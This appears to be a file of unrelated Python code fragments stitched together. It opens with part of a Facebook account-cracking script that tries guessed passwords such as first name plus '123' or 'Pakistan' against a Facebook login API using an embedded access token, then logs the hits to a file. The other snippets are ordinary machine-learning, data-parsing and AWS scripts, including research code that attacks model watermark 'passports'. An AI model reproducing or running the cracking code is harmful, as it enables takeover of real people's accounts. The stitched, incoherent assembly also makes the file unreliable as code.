'\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass2 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass2+"\n") cek.close() cekpoint.append(user+pass2) else: pass3 = b['first_name']+'786' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass3 + '\n' oks.append(user+pass3) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass3 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass3+"\n") cek.close() cekpoint.append(user+pass3) else: pass4 = b['first_name']+'123' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass4 + '\n' oks.append(user+pass4) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass4 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass4+"\n") cek.close() cekpoint.append(user+pass4) else: pass5 = '786786' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass5 + '\n' oks.append(user+pass5) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass5 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass5+"\n") cek.close() cekpoint.append(user+pass5) else: pass6 = 'Pakistan' data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") q = json.load(data) if 'access_token' in q: print '\x1b[1;91m[ ✓ ] \x1b[1;91mHack100%💉' print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mNama \x1b[1;91m : \x1b[1;91m' + b['name'] print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mID \x1b[1;91m : \x1b[1;91m' + user print '\x1b[1;91m[•⊱✿⊰•] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass6 + '\n' oks.append(user+pass6) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;95m[ ✖ ] \x1b[1;95mCeckpoint' print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mNama \x1b[1;95m : \x1b[1;95m' + b['name'] print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mID \x1b[1;95m : \x1b[1;95m' + user print '\x1b[1;95m[•⊱✿⊰•] \x1b[1;95mPassword \x1b[1;95m: \x1b[1;95m' + pass6 + '\n' cek = open("out/super_cp.txt", "a") cek.write("ID:" +user+ " Pw:" +pass6+"\n") cek.close() cekpoint.append(user+pass6) except: pass
def loadRes(self, resFile): """ Load result file and return a result api object. :param resFile (str) : file name of result file :return: res (obj) : result api object """ res = COCO() res.dataset['images'] = [img for img in self.dataset['images']] print('Loading and preparing results...') tic = time.time() if type(resFile) == str or type(resFile) == unicode: anns = json.load(open(resFile)) elif type(resFile) == np.ndarray: anns = self.loadNumpyAnnotations(resFile) else: anns = resFile assert type(anns) == list, 'results in not an array of objects' annsImgIds = [ann['image_id'] for ann in anns] assert set(annsImgIds) == (set(annsImgIds) & set(self.getImgIds())), \ 'Results do not correspond to current coco set' if 'caption' in anns[0]: imgIds = set([img['id'] for img in res.dataset['images']]) & set([ann['image_id'] for ann in anns]) res.dataset['images'] = [img for img in res.dataset['images'] if img['id'] in imgIds] for id, ann in enumerate(anns): ann['id'] = id+1 elif 'bbox' in anns[0] and not anns[0]['bbox'] == []: res.dataset['categories'] = copy.deepcopy(self.dataset['categories']) for id, ann in enumerate(anns): bb = ann['bbox'] x1, x2, y1, y2 = [bb[0], bb[0]+bb[2], bb[1], bb[1]+bb[3]] if not 'segmentation' in ann: ann['segmentation'] = [[x1, y1, x1, y2, x2, y2, x2, y1]] ann['area'] = bb[2]*bb[3] ann['height'] = bb[3] ann['id'] = id+1 ann['iscrowd'] = 0 elif 'segmentation' in anns[0]: res.dataset['categories'] = copy.deepcopy(self.dataset['categories']) for id, ann in enumerate(anns): # now only support compressed RLE format as segmentation results ann['area'] = maskUtils.area(ann['segmentation']) if not 'bbox' in ann: ann['bbox'] = maskUtils.toBbox(ann['segmentation']) ann['id'] = id+1 ann['iscrowd'] = 0 elif 'keypoints' in anns[0]: res.dataset['categories'] = copy.deepcopy(self.dataset['categories']) for id, ann in enumerate(anns): s = ann['keypoints'] x = s[0::3] y = s[1::3] x0,x1,y0,y1 = np.min(x), np.max(x), np.min(y), np.max(y) ann['area'] = (x1-x0)*(y1-y0) ann['id'] = id + 1 ann['bbox'] = [x0,y0,x1-x0,y1-y0] print('DONE (t={:0.2f}s)'.format(time.time()- tic)) res.dataset['annotations'] = anns res.createIndex() return res
import os import json import sys from utils import dict_product, iwt, generate_configs with open("../src/MuJoCo.json") as f: BASE_CONFIG = json.load(f) PARAMS = { "game": ["HalfCheetah-v2"], "mode": ["adv_ppo"], "out_dir": ["attack_lstm_atla_ppo_halfcheetah/agents"], "norm_rewards": ["returns"], "initialization": ["orthogonal"], "anneal_lr": [True, False], "ppo_lr_adam": [0.0], # this disables policy learning and we run attacks only. "adv_clip_eps": [0.2, 0.4], "adv_entropy_coeff": [0.0, 1e-5, 3e-5, 1e-4, 3e-4, 1e-3], "adv_ppo_lr_adam": [1e-3, 3e-3, 1e-2], "adv_val_lr": [1e-4, 3e-4, 1e-3], "save_iters": [20], "train_steps": [488], "robust_ppo_eps": [0.15], # used for attack "history_length": [100], "load_model": [ "models/atla_release/ATLA-LSTM-PPO/model-lstm-atla-ppo-ppo-halfcheetah.model" ], # models for attack "value_clipping": [True], }
ID = 'P' date = '5_17_2019' overwriteFlag = 1 date_obj = datetime.date.today() date_str = "%s_%s_%s" % (date_obj.month, date_obj.day, date_obj.year) table = "PreProcessingTable_{}_{}.json".format(ID, date) TasksDir = Path.cwd() / 'TasksDir' if not TasksDir.exists(): sys.exit('Task directory not found.') if (TasksDir / table).exists(): with open(str(TasksDir / table), 'r') as f: task_table = json.load(f) nJobs = len(task_table) completed_table = "PreProcessingTable_{}_{}_Completed.json".format(ID, date) if not (TasksDir / completed_table).exists() or overwriteFlag: table_c = {} jobs = np.arange(1, nJobs + 1) for t in jobs: table_c[str(t)] = 0 table_c['table'] = table table_c['updated'] = date_str with open(str(TasksDir / completed_table), 'w') as f: json.dump(table_c, f, indent=4) else: with open(str(TasksDir / completed_table), 'r') as f:
def train_until(max_iteration, data_sources, input_shape, output_shape, dt_scaling_factor, loss_name): ArrayKey('RAW') ArrayKey('RAW_UP') ArrayKey('ALPHA_MASK') ArrayKey('GT_LABELS') ArrayKey('MASK') ArrayKey('MASK_UP') ArrayKey('GT_DIST_CENTROSOME') ArrayKey('GT_DIST_GOLGI') ArrayKey('GT_DIST_GOLGI_MEM') ArrayKey('GT_DIST_ER') ArrayKey('GT_DIST_ER_MEM') ArrayKey('GT_DIST_MVB') ArrayKey('GT_DIST_MVB_MEM') ArrayKey('GT_DIST_MITO') ArrayKey('GT_DIST_MITO_MEM') ArrayKey('GT_DIST_LYSOSOME') ArrayKey('GT_DIST_LYSOSOME_MEM') ArrayKey('PRED_DIST_CENTROSOME') ArrayKey('PRED_DIST_GOLGI') ArrayKey('PRED_DIST_GOLGI_MEM') ArrayKey('PRED_DIST_ER') ArrayKey('PRED_DIST_ER_MEM') ArrayKey('PRED_DIST_MVB') ArrayKey('PRED_DIST_MVB_MEM') ArrayKey('PRED_DIST_MITO') ArrayKey('PRED_DIST_MITO_MEM') ArrayKey('PRED_DIST_LYSOSOME') ArrayKey('PRED_DIST_LYSOSOME_MEM') ArrayKey('SCALE_CENTROSOME') ArrayKey('SCALE_GOLGI') ArrayKey('SCALE_GOLGI_MEM') ArrayKey('SCALE_ER') ArrayKey('SCALE_ER_MEM') ArrayKey('SCALE_MVB') ArrayKey('SCALE_MVB_MEM') ArrayKey('SCALE_MITO') ArrayKey('SCALE_MITO_MEM') ArrayKey('SCALE_LYSOSOME') ArrayKey('SCALE_LYSOSOME_MEM') data_providers = [] data_dir = "/groups/saalfeld/saalfeldlab/larissa/data/cell/{0:}.n5" voxel_size_up = Coordinate((4, 4, 4)) voxel_size_orig = Coordinate((8, 8, 8)) input_size = Coordinate(input_shape) * voxel_size_orig output_size = Coordinate(output_shape) * voxel_size_orig if tf.train.latest_checkpoint('.'): trained_until = int(tf.train.latest_checkpoint('.').split('_')[-1]) print('Resuming training from', trained_until) else: trained_until = 0 print('Starting fresh training') for src in data_sources: n5_source = N5Source( os.path.join(data_dir.format(src)), datasets={ ArrayKeys.RAW_UP: 'volumes/raw', ArrayKeys.GT_LABELS: 'volumes/labels/all', ArrayKeys.MASK_UP: 'volumes/mask' }, array_specs={ ArrayKeys.MASK_UP: ArraySpec(interpolatable=False) } ) data_providers.append(n5_source) with open('net_io_names.json', 'r') as f: net_io_names = json.load(f) # specifiy which Arrays should be requested for each batch request = BatchRequest() request.add(ArrayKeys.RAW, input_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.RAW_UP, input_size, voxel_size=voxel_size_up) request.add(ArrayKeys.GT_LABELS, output_size, voxel_size=voxel_size_up) request.add(ArrayKeys.MASK_UP, output_size, voxel_size=voxel_size_up) request.add(ArrayKeys.MASK, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_CENTROSOME, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_GOLGI, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_GOLGI_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_ER, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_ER_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_MVB, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_MVB_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_MITO, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_MITO_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_LYSOSOME, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.GT_DIST_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_CENTROSOME, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_GOLGI, output_size, voxel_size=voxel_size_orig) #request.add(ArrayKeys.SCALE_GOLGI_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_ER, output_size, voxel_size=voxel_size_orig) #request.add(ArrayKeys.SCALE_ER_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_MVB, output_size, voxel_size=voxel_size_orig) #request.add(ArrayKeys.SCALE_MVB_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_MITO, output_size, voxel_size=voxel_size_orig) #request.add(ArrayKeys.SCALE_MITO_MEM, output_size, voxel_size=voxel_size_orig) request.add(ArrayKeys.SCALE_LYSOSOME, output_size, voxel_size=voxel_size_orig) #request.add(ArrayKeys.SCALE_LYSOSOME_MEM, output_size, voxel_size=voxel_size_orig) # create a tuple of data sources, one for each HDF file data_sources = tuple( provider + Normalize(ArrayKeys.RAW_UP) + # ensures RAW is in float in [0, 1] # zero-pad provided RAW and MASK to be able to draw batches close to # the boundary of the available data # size more or less irrelevant as followed by Reject Node Pad(ArrayKeys.RAW_UP, None) + RandomLocation(min_masked=0.5, mask=ArrayKeys.MASK_UP) # chose a random location inside the provided arrays #Reject(ArrayKeys.MASK) # reject batches wich do contain less than 50% labelled data for provider in data_providers) snapshot_request = BatchRequest() snapshot_request.add(ArrayKeys.PRED_DIST_CENTROSOME, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_GOLGI_MEM, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_ER, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_ER_MEM, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_MVB, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_MVB_MEM, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_MITO, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_MITO_MEM, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME, output_size) snapshot_request.add(ArrayKeys.PRED_DIST_LYSOSOME_MEM, output_size) train_pipeline = ( data_sources + RandomProvider() + ElasticAugment((100, 100, 100), (10., 10., 10.), (0, math.pi/2.0), prob_slip=0, prob_shift=0, max_misalign=0, subsample=8) + SimpleAugment() + ElasticAugment((40, 1000, 1000), (10., 0., 0.), (0, 0), subsample=8) + IntensityAugment(ArrayKeys.RAW_UP, 0.9, 1.1, -0.1, 0.1) + IntensityScaleShift(ArrayKeys.RAW_UP, 2, -1) + ZeroOutConstSections(ArrayKeys.RAW_UP) + #GrowBoundary(steps=1) + #SplitAndRenumberSegmentationLabels() + #AddGtAffinities(malis.mknhood3d()) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_CENTROSOME, normalize='tanh', normalize_args=dt_scaling_factor, label_id=1, factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_GOLGI, normalize='tanh', normalize_args=dt_scaling_factor, label_id=(2, 11), factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_GOLGI_MEM, normalize='tanh', normalize_args=dt_scaling_factor, label_id=11, factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_ER, normalize='tanh', normalize_args=dt_scaling_factor, label_id=(3, 10), factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_ER_MEM, normalize='tanh', normalize_args=dt_scaling_factor, label_id=10, factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_MVB, normalize='tanh', normalize_args=dt_scaling_factor, label_id=(4, 9), factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_MVB_MEM, normalize='tanh', normalize_args=dt_scaling_factor, label_id=9, factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_MITO, normalize='tanh', normalize_args=dt_scaling_factor, label_id=(5, 8), factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_MITO_MEM, normalize='tanh', normalize_args=dt_scaling_factor, label_id=8, factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_LYSOSOME, normalize='tanh', normalize_args=dt_scaling_factor, label_id=(6, 7), factor=2 ) + AddDistance(label_array_key=ArrayKeys.GT_LABELS, distance_array_key=ArrayKeys.GT_DIST_LYSOSOME_MEM, normalize='tanh', normalize_args=dt_scaling_factor, label_id=7, factor=2 ) + DownSample(ArrayKeys.MASK_UP, 2, ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_CENTROSOME, ArrayKeys.SCALE_CENTROSOME, mask=ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI, ArrayKeys.SCALE_GOLGI, mask=ArrayKeys.MASK) + #BalanceByThreshold(ArrayKeys.GT_DIST_GOLGI_MEM, ArrayKeys.SCALE_GOLGI_MEM, mask=ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_ER, ArrayKeys.SCALE_ER, mask=ArrayKeys.MASK) + #BalanceByThreshold(ArrayKeys.GT_DIST_ER_MEM, ArrayKeys.SCALE_ER_MEM, mask=ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_MVB, ArrayKeys.SCALE_MVB, mask=ArrayKeys.MASK) + #BalanceByThreshold(ArrayKeys.GT_DIST_MVB_MEM, ArrayKeys.SCALE_MVB_MEM, mask=ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_MITO, ArrayKeys.SCALE_MITO, mask=ArrayKeys.MASK) + #BalanceByThreshold(ArrayKeys.GT_DIST_MITO_MEM, ArrayKeys.SCALE_MITO_MEM, mask=ArrayKeys.MASK) + BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME, ArrayKeys.SCALE_LYSOSOME, mask=ArrayKeys.MASK) + #BalanceByThreshold(ArrayKeys.GT_DIST_LYSOSOME_MEM, ArrayKeys.SCALE_LYSOSOME_MEM, mask=ArrayKeys.MASK) + #BalanceByThreshold( # labels=ArrayKeys.GT_DIST, # scales= ArrayKeys.GT_SCALE) + #{ # ArrayKeys.GT_AFFINITIES: ArrayKeys.GT_SCALE # }, # { # ArrayKeys.GT_AFFINITIES: ArrayKeys.MASK # }) + DownSample(ArrayKeys.RAW_UP, 2, ArrayKeys.RAW) + PreCache( cache_size=40, num_workers=10)+ Train( 'build', optimizer=net_io_names['optimizer'], loss=net_io_names[loss_name], inputs={ net_io_names['raw']: ArrayKeys.RAW, net_io_names['gt_centrosome']: ArrayKeys.GT_DIST_CENTROSOME, net_io_names['gt_golgi']: ArrayKeys.GT_DIST_GOLGI, net_io_names['gt_golgi_mem']: ArrayKeys.GT_DIST_GOLGI_MEM, net_io_names['gt_er']: ArrayKeys.GT_DIST_ER, net_io_names['gt_er_mem']: ArrayKeys.GT_DIST_ER_MEM, net_io_names['gt_mvb']: ArrayKeys.GT_DIST_MVB, net_io_names['gt_mvb_mem']: ArrayKeys.GT_DIST_MVB_MEM, net_io_names['gt_mito']: ArrayKeys.GT_DIST_MITO, net_io_names['gt_mito_mem']: ArrayKeys.GT_DIST_MITO_MEM, net_io_names['gt_lysosome']: ArrayKeys.GT_DIST_LYSOSOME, net_io_names['gt_lysosome_mem']: ArrayKeys.GT_DIST_LYSOSOME_MEM, net_io_names['w_centrosome']: ArrayKeys.SCALE_CENTROSOME, net_io_names['w_golgi']: ArrayKeys.SCALE_GOLGI, net_io_names['w_golgi_mem']: ArrayKeys.SCALE_GOLGI, net_io_names['w_er']: ArrayKeys.SCALE_ER, net_io_names['w_er_mem']: ArrayKeys.SCALE_ER, net_io_names['w_mvb']: ArrayKeys.SCALE_MVB, net_io_names['w_mvb_mem']: ArrayKeys.SCALE_MVB, net_io_names['w_mito']: ArrayKeys.SCALE_MITO, net_io_names['w_mito_mem']: ArrayKeys.SCALE_MITO, net_io_names['w_lysosome']: ArrayKeys.SCALE_LYSOSOME, net_io_names['w_lysosome_mem']: ArrayKeys.SCALE_LYSOSOME, }, summary=net_io_names['summary'], log_dir='log', outputs={ net_io_names['centrosome']: ArrayKeys.PRED_DIST_CENTROSOME, net_io_names['golgi']: ArrayKeys.PRED_DIST_GOLGI, net_io_names['golgi_mem']: ArrayKeys.PRED_DIST_GOLGI_MEM, net_io_names['er']: ArrayKeys.PRED_DIST_ER, net_io_names['er_mem']: ArrayKeys.PRED_DIST_ER_MEM, net_io_names['mvb']: ArrayKeys.PRED_DIST_MVB, net_io_names['mvb_mem']: ArrayKeys.PRED_DIST_MVB_MEM, net_io_names['mito']: ArrayKeys.PRED_DIST_MITO, net_io_names['mito_mem']: ArrayKeys.PRED_DIST_MITO_MEM, net_io_names['lysosome']: ArrayKeys.PRED_DIST_LYSOSOME, net_io_names['lysosome_mem']: ArrayKeys.PRED_DIST_LYSOSOME_MEM, }, gradients={} ) + Snapshot({ ArrayKeys.RAW: 'volumes/raw', ArrayKeys.GT_LABELS: 'volumes/labels/gt_labels', ArrayKeys.GT_DIST_CENTROSOME: 'volumes/labels/gt_dist_centrosome', ArrayKeys.PRED_DIST_CENTROSOME: 'volumes/labels/pred_dist_centrosome', ArrayKeys.GT_DIST_GOLGI: 'volumes/labels/gt_dist_golgi', ArrayKeys.PRED_DIST_GOLGI: 'volumes/labels/pred_dist_golgi', ArrayKeys.GT_DIST_GOLGI_MEM: 'volumes/labels/gt_dist_golgi_mem', ArrayKeys.PRED_DIST_GOLGI_MEM: 'volumes/labels/pred_dist_golgi_mem', ArrayKeys.GT_DIST_ER: 'volumes/labels/gt_dist_er', ArrayKeys.PRED_DIST_ER: 'volumes/labels/pred_dist_er', ArrayKeys.GT_DIST_ER_MEM: 'volumes/labels/gt_dist_er_mem', ArrayKeys.PRED_DIST_ER_MEM: 'volumes/labels/pred_dist_er_mem', ArrayKeys.GT_DIST_MVB: 'volumes/labels/gt_dist_mvb', ArrayKeys.PRED_DIST_MVB: 'volumes/labels/pred_dist_mvb', ArrayKeys.GT_DIST_MVB_MEM: 'volumes/labels/gt_dist_mvb_mem', ArrayKeys.PRED_DIST_MVB_MEM: 'volumes/labels/pred_dist_mvb_mem', ArrayKeys.GT_DIST_MITO: 'volumes/labels/gt_dist_mito', ArrayKeys.PRED_DIST_MITO: 'volumes/labels/pred_dist_mito', ArrayKeys.GT_DIST_MITO_MEM: 'volumes/labels/gt_dist_mito_mem', ArrayKeys.PRED_DIST_MITO_MEM: 'volumes/labels/pred_dist_mito_mem', ArrayKeys.GT_DIST_LYSOSOME: 'volumes/labels/gt_dist_lysosome', ArrayKeys.PRED_DIST_LYSOSOME: 'volumes/labels/pred_dist_lysosome', ArrayKeys.GT_DIST_LYSOSOME_MEM: 'volumes/labels/gt_dist_lysosome_mem', ArrayKeys.PRED_DIST_LYSOSOME_MEM: 'volumes/labels/pred_dist_lysosome_mem', }, every=500, output_filename='batch_{iteration}.hdf', output_dir='snapshots/', additional_request=snapshot_request) + PrintProfilingStats(every=50)) print("Starting training...") with build(train_pipeline) as b: for i in range(max_iteration): b.request_batch(request) print("Training finished")
import json with open('./crossword.json') as f: data = json.load(f) squares = data["squares"] for square in squares: square["isPencil"] = False with open('crossword_parsed.json', 'w') as json_f: json.dump(data, json_f) # import json # import copy # def nonesorter(square): # if not square["down"]["puzzleIndex"]: # return (256, square["squareIndex"]) # return (square["down"]["puzzleIndex"], square["squareIndex"]) # with open('./crossword.json') as f: # data = json.load(f) # squares = data["squares"] # currSquareIndex = 0 # currPuzzleIndex = 1 # vertical_order = sorted(squares, key=nonesorter) # with open('crossword_sorted.json', 'w') as json_f:
import jk_tokenizingparsing import json FILE_PATH = "tokenize_json.json" textConverterMgr = jk_tokenizingparsing.TextConverterManager() textConverterMgr.register(jk_tokenizingparsing.Convert4HexToUnicode()) with open(FILE_PATH, "r") as f: tokenizer = jk_tokenizingparsing.fromJSON(textConverterMgr, json.load(f)) for t in tokenizer.tokenize("{'a':123}"): print(t)
#!/usr/bin/python3 import json import boto3 import sys with open('/opt/aws_panel/parameters.json', 'r') as json_data: params = json.load(json_data) ins_details = [] instance = {} access_id = params.get('access_token').strip() secret_key = params.get('secret_token').strip() #aws_region = params.get('aws_region_name').strip() # print (sys.argv[1]) aws_region = sys.argv[1] ec2client = boto3.client('ec2', aws_access_key_id=access_id, aws_secret_access_key=secret_key, region_name=aws_region,) response = ec2client.describe_instances() for instance_data in response["Reservations"]: volumes = [] instance = {} if instance_data.get('Instances')[0].get('State').get('Name') == 'terminated':
def run_maximize(rep=1, flipperc=0, arch='alexnet', dataset='cifar10', scheme=1, loadpath='', passport_config=''): epochs = 100 batch_size = 64 nclass = 100 if dataset == 'cifar100' else 10 inchan = 3 lr = 0.01 device = torch.device('cuda') trainloader, valloader = prepare_dataset({'transfer_learning': False, 'dataset': dataset, 'tl_dataset': '', 'batch_size': batch_size}) passport_kwargs = construct_passport_kwargs_from_dict({'passport_config': json.load(open(passport_config)), 'norm_type': 'bn', 'sl_ratio': 0.1, 'key_type': 'shuffle'}) if scheme == 1: model = AlexNetPassport(inchan, nclass, passport_kwargs) elif scheme == 2: model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs) else: model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs) sd = torch.load(loadpath) model.load_state_dict(sd, strict=False) for fidx in [0, 2]: model.features[fidx].bn.weight.data.copy_(sd[f'features.{fidx}.scale']) model.features[fidx].bn.bias.data.copy_(sd[f'features.{fidx}.bias']) for param in model.parameters(): param.requires_grad_(False) passblocks = [] origpassport = [] fakepassport = [] for m in model.modules(): if isinstance(m, PassportBlock) or isinstance(m, PassportPrivateBlock): passblocks.append(m) if scheme == 1: keyname = 'key' skeyname = 'skey' else: keyname = 'key_private' skeyname = 'skey_private' key, skey = m.__getattr__(keyname).data.clone(), m.__getattr__(skeyname).data.clone() origpassport.append(key.to(device)) origpassport.append(skey.to(device)) m.__delattr__(keyname) m.__delattr__(skeyname) m.register_parameter(keyname, nn.Parameter(key.clone() + torch.randn(*key.size()) * 0.001)) m.register_parameter(skeyname, nn.Parameter(skey.clone() + torch.randn(*skey.size()) * 0.001)) fakepassport.append(m.__getattr__(keyname)) fakepassport.append(m.__getattr__(skeyname)) if flipperc != 0: print(f'Reverse {flipperc * 100:.2f}% of binary signature') for m in passblocks: mflip = flipperc if scheme == 1: oldb = m.sign_loss.b else: oldb = m.sign_loss_private.b newb = oldb.clone() npidx = np.arange(len(oldb)) randsize = int(oldb.view(-1).size(0) * mflip) randomidx = np.random.choice(npidx, randsize, replace=False) newb[randomidx] = oldb[randomidx] * -1 # reverse bit if scheme == 1: m.sign_loss.set_b(newb) else: m.sign_loss_private.set_b(newb) model.to(device) optimizer = torch.optim.SGD(fakepassport, lr=lr, momentum=0.9, weight_decay=0.0005) # scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, # [int(epochs * 0.5), int(epochs * 0.75)], # 0.1) scheduler = None criterion = nn.CrossEntropyLoss() history = [] os.makedirs('logs/passport_attack_3', exist_ok=True) def run_cs(): cs = [] for d1, d2 in zip(origpassport, fakepassport): d1 = d1.view(d1.size(0), -1) d2 = d2.view(d2.size(0), -1) cs.append(F.cosine_similarity(d1, d2).item()) return cs print('Before training') res = {} valres = test(model, criterion, valloader, device, scheme) for key in valres: res[f'valid_{key}'] = valres[key] with torch.no_grad(): cs = run_cs() mseloss = 0 for l, r in zip(origpassport, fakepassport): mse = F.mse_loss(l, r) mseloss += mse.item() mseloss /= len(origpassport) print(f'MSE of Real and Maximize passport: {mseloss:.4f}') print(f'Cosine Similarity of Real and Maximize passport: {sum(cs) / len(origpassport):.4f}') print() res['epoch'] = 0 res['cosine_similarity'] = cs 